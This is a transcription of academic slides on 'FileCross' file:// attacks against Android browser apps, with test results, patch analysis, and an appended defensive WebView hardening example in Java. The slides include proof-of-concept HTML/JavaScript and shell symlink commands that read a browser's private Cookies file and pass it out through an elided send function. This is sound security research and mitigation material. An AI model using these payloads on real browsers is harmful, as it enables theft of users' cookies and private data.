Analyzing Android Browser Apps for file:// Vulnerabilities. Daoyuan Wu and Rocky Chang, The Hong Kong Polytechnic University. Information Security Conference (ISC), Oct 13, 2014.


file://
It is a standard URI scheme used in modern browsers, like the well-known http:// and https://. It can be used to browse local files.

Unfortunately, file:// is an enemy of the mobile security model.

Mobile Security Model: Sandbox-based App Isolation
(Figure: App A and App B are separated by the app boundary; each app's sensitive files stay inside its own sandbox.)

However, file:// requests may break the app data isolation
(Figure: a file:// request from one app crosses the app boundary into the other app; file:// vulnerabilities there let the sensitive files be stolen and carried back across the boundary.)

An Empirical Study on file:// Vulnerabilities in Android Browser Apps
– A unified attack model, FileCross
– Automated testing of Android browsers
– Vulnerability results: 64 vulnerable browsers, 177 FileCross issues, across different system versions and web engines
– Further analysis: analyze 10 patches and current file:// practices

The FileCross attacks

Setting: an Attack App issues external file:// browsing requests to the Exposed Browsing Interface of a Victim Browser. The browser's Private File Zone holds sensitive files (the Cookies file in the slide). The four requests shown:

    file:///data/data/pkg/dir/Cookies   (A1)
    file:///path/attack2.html           (A2)
    file:///path/attack3.html           (A3)
    file:///path/attack4.html           (A4)

(A1) The requested private file is auto-downloaded to the SD card. The attack app then waits and reads it back (Cmd 1):

    Thread.sleep(3000);
    filepath = findFileInSDcard("Cookies");
    if (filepath) readFileFromSDcard(filepath);

(A2) attack2.html reads Cookies: compromise SOP on the “host” level.

    <html><body><h1>attack2</h1><script>
    var aim = '/data/data/pkg/dir/Cookies';
    function sendFile(txt) { … }
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
      if (xhr.readyState == 4) { sendFile(xhr.responseText); }
    };
    xhr.open('GET', aim);
    xhr.send(null);
    </script></body></html>

(A3) attack3.html reads http(s):// content: compromise SOP on the “protocol” level. The script is the same as attack2, except that aim is set to an http(s):// URL (the slide shows only `var aim = '`; the URL is cut off).

(A4) attack4.html reads document.URL, which by then points at Cookies: compromise SOP via symbolic links. The page fetches its own URL after an 8-second delay; in the meantime the attack app replaces the file with a symbolic link (Cmd 4):

    Thread.sleep(4000);
    rm /path/attack4.html
    ln -s /.../Cookies /path/attack4.html

    <html><body><h1>attack4</h1><script>
    var aim = document.URL;
    function sendFile(txt) { … }
    setTimeout(function() {
      var xhr = new XMLHttpRequest();
      xhr.onload = function() { sendFile(xhr.responseText); };
      xhr.open('GET', aim);
      xhr.send(null);
    }, 8000);
    </script></body></html>

Automated Testing of Android Browsers
Test over 100 Android browsers in less than four hours (on multiple devices concurrently).

The Architecture and Workflow of Our Testing System

The Major Testing Steps: Identifying Exposed Browsing Interfaces (EBI)
Propose a lightweight but effective scoring mechanism
– Score each component based on our summarized EBI patterns
– Select the component with the maximal score as the EBI
This accurately identifies the EBIs in 113 of the 116 tested browsers. Of the remaining three, one is an add-on and the other two do not expose browsing interfaces.

The Major Testing Steps: Warming up browsers and finding target sensitive files
The goal of warming up browsers is to produce some private files. Our system then searches the newly generated private files for target sensitive files, matching the keywords “cookie”, “password” and “bookmark”.

The Major Testing Steps: Automatic attack validation and characterization
We cannot rely on naked-eye inspection. Instead, five patterns are embedded into the attack requests, and the Web Receiver interprets them automatically:
    ?pkg=<app pkg name>&atk=<attack ID>&ver=<device version>&con=<contents>&kid=<a key ID>

Our Findings
1) Vulnerability results
2) Vulnerability distribution
3) Further analysis

Overall Vulnerability Results
 More than half of the browsers tested are vulnerable to the FileCross attacks (64 vulnerable browsers).
 50% of the most popular browsers are also vulnerable (such as Firefox, Baidu, and Maxthon).

Representative Vulnerable Browsers

Vulnerability Distribution: Across Different System Versions
 The file:// vulnerabilities are exploitable in all Android versions.
 A2 and A3 affect Android 4.0 the most.
 But Android 4.3 still has over 30 issues of A2 and A3.
 Android 4.4, which employs a Chrome-based web engine, is still exploitable by A2, A3 and A4.
 A4 has no engine-level patch in 4.4.

Vulnerability Distribution: Across Different Web Engines
Among the 15 browsers that employ custom engines, three are vulnerable:
Firefox: libmozglue.so
UC Browser HD: libWebCore_UC.so
Sogou: libsogouwebcore.so
This demonstrates that our automated system is valuable for testing browsers that may adopt different engines.

Patch Analysis
We have devoted considerable effort to reporting our identified vulnerabilities.

The Current Practice on Exposed Browsing Interfaces
(Figure: a breakdown of exposed browsing interfaces in the 115 tested browsers.)

The Current Practice on file:// Support in Android Browsers
65% of the browsers accept external file:// browsing requests.
62% even allow file:// access to the private file zones.
– We believe this practice should be forbidden in the mobile environment.
63% support JavaScript execution in file:// URLs.

Some Good Practice Examples on file:// Support in Android Browsers
 file:// is generally not supported in lightweight and dedicated browsers (which spares them from the FileCross attacks).
 Several popular browsers already forbid file:// access to private file zones (Chrome, Dolphin, UC, Yandex browsers).
 Three browsers have actively disabled JavaScript execution in file:// URLs.

Q & A
My homepage:

Exposed Browsing Interfaces (EBI) Patterns

Four Types of FileCross Attacks

    Attack ID | Major flaws                                   | Sources
    A1        | Auto-download file to SD card                 | [2]
    A2        | SOP bypass for two file:// origins            | setAllowFileAccessFromFileURLs
    A3        | SOP bypass for file:// and http(s):// origins | setAllowUniversalAccessFromFileURLs
    A4        | SOP bypass in handling symbolic links         | [3,4]

We are the first to identify them as a unified attack model (i.e., FileCross) and to conduct automated testing to analyze their prevalence in Android browsers.
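The table above names the two WebSettings flags behind A2 and A3, and slides 20 and 21 list the three practices that close off the attacks (refuse file:// access to the private file zone, keep file:// origins from reading other origins, and run no JavaScript in file:// URLs). The following is an added example of how an Android browser activity that exposes a browsing interface can apply all three; it is not the paper's testing system or any tested browser's code. The class and method names (HardenedBrowserActivity, isForbiddenFileUrl, applyFileSchemePolicy) are my own; the API calls are the public android.webkit.WebSettings and android.net.Uri methods, and the private file zone is taken from the runtime (getApplicationInfo().dataDir) rather than hard-coded.

```java
// Added example (not from the paper or any browser's source code): an activity
// that receives external browsing requests and refuses the FileCross pattern.
// Assumptions: the URL to open arrives in Intent.getData(); the app's private
// file zone is ApplicationInfo.dataDir (the /data/data/<pkg> directory).
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebSettings;
import android.webkit.WebView;

import java.io.File;
import java.io.IOException;

public class HardenedBrowserActivity extends Activity {

    /**
     * Returns true when a file:// URL handed in from outside must not be loaded:
     * its target, after resolving symbolic links, lies inside the browser's own
     * private file zone (the A1/A2 target, and what an A4-style symlink points at).
     * Non-file URLs are not this policy's concern and return false.
     */
    static boolean isForbiddenFileUrl(Uri url, File privateZone) {
        if (url == null || !"file".equalsIgnoreCase(url.getScheme())) {
            return false;
        }
        String path = url.getPath();
        if (path == null) {
            return true; // a file:// URL without a path is not worth loading
        }
        try {
            // getCanonicalPath() follows symlinks, so a link on the SD card that
            // points into the private zone is compared by where it really points.
            String target = new File(path).getCanonicalPath();
            String zone = privateZone.getCanonicalPath();
            return target.equals(zone) || target.startsWith(zone + File.separator);
        } catch (IOException e) {
            return true; // cannot tell where it points: refuse
        }
    }

    /** Settings that remove the A2 and A3 flaws and disable script in file:// pages. */
    static void applyFileSchemePolicy(WebSettings s, boolean loadingFileUrl) {
        // A2: a file:// page may not read other file:// origins.
        s.setAllowFileAccessFromFileURLs(false);
        // A3: a file:// page may not read http(s):// origins.
        s.setAllowUniversalAccessFromFileURLs(false);
        // The file system is reachable only while the user browses a local file;
        // http(s) pages get no file:// or content:// access at all.
        s.setAllowFileAccess(loadingFileUrl);
        s.setAllowContentAccess(false);
        // Third practice from slide 21: no JavaScript execution in file:// URLs.
        s.setJavaScriptEnabled(!loadingFileUrl);
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        setContentView(webView);

        Intent intent = getIntent();
        Uri url = intent != null ? intent.getData() : null;
        File privateZone = new File(getApplicationInfo().dataDir);

        if (isForbiddenFileUrl(url, privateZone)) {
            finish(); // never load the private file zone on an external request
            return;
        }
        boolean isFile = url != null && "file".equalsIgnoreCase(url.getScheme());
        applyFileSchemePolicy(webView.getSettings(), isFile);
        webView.loadUrl(url != null ? url.toString() : "about:blank");
    }
}
```

Two caveats follow from the slides themselves. The path check runs once, at load time; A4 swaps the file for a symbolic link after the page has loaded, so that attack is stopped by the file-origin and JavaScript settings, not by the canonical-path comparison. And setAllowFileAccessFromFileURLs and setAllowUniversalAccessFromFileURLs only exist from API level 16 (Android 4.1), where their default is already false; on Android 4.0, which slide 16 shows as the most affected, the cross-origin access is on and cannot be switched off, which leaves refusing external file:// requests or disabling JavaScript as the only options. A real browser would also re-apply the policy on every navigation (for example in WebViewClient.shouldOverrideUrlLoading), since a single WebView moves between file:// and http(s):// pages.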